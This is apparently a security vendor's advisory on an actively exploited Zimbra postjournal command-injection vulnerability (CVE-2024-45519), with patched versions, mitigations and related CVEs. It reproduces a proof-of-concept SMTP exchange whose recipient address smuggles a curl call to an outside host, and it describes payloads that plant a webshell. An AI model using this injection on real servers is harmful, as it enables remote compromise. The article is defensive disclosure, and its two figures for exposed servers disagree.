Zimbra Remote Code Execution Vulnerability Under Active Attack
Key Takeaways
A critical remote code execution (RCE) vulnerability (CVE-2024-45519) in Zimbra’s postjournal service is under active attack; users are urged to patch immediately.
A Proof of Concept (PoC) demonstrated that the vulnerability can be exploited with specially crafted emails.
The postjournal SMTP parsing service is not enabled by default in Zimbra, but as Cyble sensors detect more than 90,000 web-facing Zimbra instances with unpatched earlier vulnerabilities, all Zimbra customers should approach this issue with urgency.
Overview
A critical vulnerability (CVE-2024-45519) in Zimbra’s postjournal service that allows unauthenticated remote command execution is under active attack.
The vulnerability allows unsanitized user input to be passed to popen, enabling attackers to inject arbitrary commands.
Patched versions add input sanitization and replace popen with execvp to mitigate the direct command injection vulnerability. Zimbra administrators should also check the configuration of the mynetworks parameter to prevent external exploitation.
Patched versions include these versions and newer:
9.0.0 Patch 41
10.0.9
10.1.1
8.8.15 Patch 46
One IP that has been identified as a source of malicious emails and exploit attempts is 79.124.49[.]86.
Technical Analysis
Exploitation began after ProjectDiscovery researchers reported a Proof of Concept (PoC) for the vulnerability.
The researchers reversed the postjournal binary and found that there were no calls to execvp or the run_command function. Instead, a direct call to popen was made in the read_maps function, allowing input to be passed without sanitization. The cmd argument passed to popen in double quotes would prevent command injection with simple shell metacharacters, but that control could be bypassed with $() syntax.
The postjournal service was then exploited via port 10027 with the following SMTP commands:
EHLO localhost
MAIL FROM: <aaaa@mail.domain.com>
RCPT TO: <“aabbb$(curl${IFS}oast.me)”@mail.domain.com>
DATA
Test message
.
The same exploit over SMTP port 25 required the postjournal service to be enabled, which was accomplished with a Bash script:
zmlocalconfig -e postjournal_enabled=true
zmcontrol restart
To enable remote exploit, the researchers found that the mynetworks default configuration included a /20 CIDR range of their public IP address, which could allow the exploit to be performed remotely if the postjournal service is enabled and the attacker is within the allowed network range.
Proofpoint researchers have observed the vulnerability under exploitation, with spoofing emails sent to fake addresses in CC fields to try to get Zimbra servers to parse and execute them as commands. The addresses contained base64 strings that are executed with the sh utility.
Some of the emails used CC’d addresses in an attempt to build a webshell on a vulnerable Zimbra server. The full CC list is wrapped as a string, and if connected, the base64 blobs decode to a command to write a webshell to /jetty/webapps/zimbraAdmin/public/jsp/zimbraConfig.jsp (see image below).
Once installed, the webshell listens for inbound connections and also has support for command execution via exec or download and execute over a socket connection.
Zimbra is a popular target of cyber threat actors, and CISA already includes several critical vulnerabilities in the Zimbra Product Suite in its Known Exploited Vulnerabilities catalog:
cveID
vendorProject
product
vulnerabilityName
CVE-2023-37580
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-27926
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-41352
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-27925
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Arbitrary File Upload Vulnerability
CVE-2022-37042
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Authentication Bypass Vulnerability
CVE-2022-27924
Zimbra
Collaboration (ZCS)
Zimbra Collaboration (ZCS) Command Injection Vulnerability
CVE-2018-6882
Zimbra
Collaboration Suite (ZCS)
Zimbra Collaboration Suite (ZCS) Cross-Site Scripting (XSS) Vulnerability
CVE-2022-24682
Zimbra
Webmail
Zimbra Webmail Cross-Site Scripting Vulnerability
While CVE-2024-45519 hasn’t been officially reported yet, Cyble data already shows more than 50,000 web-exposed Zimbra servers with unpatched earlier critical vulnerabilities. It remains to be seen how many will be exposed to the latest vulnerability.
Recommendations
All Zimbra administrators should:
Disable postjournal if not needed
Configure mynetworks to prevent unauthorized access
Apply the latest security updates directly from Zimbra
The post Zimbra Remote Code Execution Vulnerability Under Active Attack appeared first on Cyble.
Blog – Cyble – Read More